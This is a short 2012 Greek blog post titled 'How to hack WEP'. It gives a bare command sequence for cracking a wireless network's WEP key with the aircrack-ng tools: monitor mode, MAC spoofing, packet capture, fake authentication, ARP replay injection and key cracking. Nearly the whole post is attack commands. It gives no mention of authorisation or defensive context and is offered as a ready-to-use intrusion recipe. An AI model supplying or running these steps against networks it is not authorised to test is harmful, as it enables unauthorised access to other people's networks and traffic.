Blogger Widgets

Δευτέρα 13 Αυγούστου 2012

How to hack WEP

Start console and type:
airmon-ng
ex.wlan0
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
ifconfig wlan0 up
airmon-ng start wlan0

Then if you want continue to the same console or open a new one(I think it's better...)

airodump-ng mon0
airodump-ng -c 6 -w wep --bssid xx:xx:xx:xx:xx:xx mon0
(6 is the channel and wep is key encryption in your case maybe will be different)
aireplay-ng -9 -e " network's name" -a "bssid" mon0
aireplay-ng -1 0 -a  xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 mon0
aireplay-ng -3 -b  xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 mon0

Also now open a new console and type:

aircrack-ng -b xx:xx:xx:xx:xx:xx wep-01.cap

Δεν υπάρχουν σχόλια:

Δημοσίευση σχολίου

IP widget
Έχετε συνδεθεί στην σελίδα πριν:

Δευτερόλ.
GRDriftKing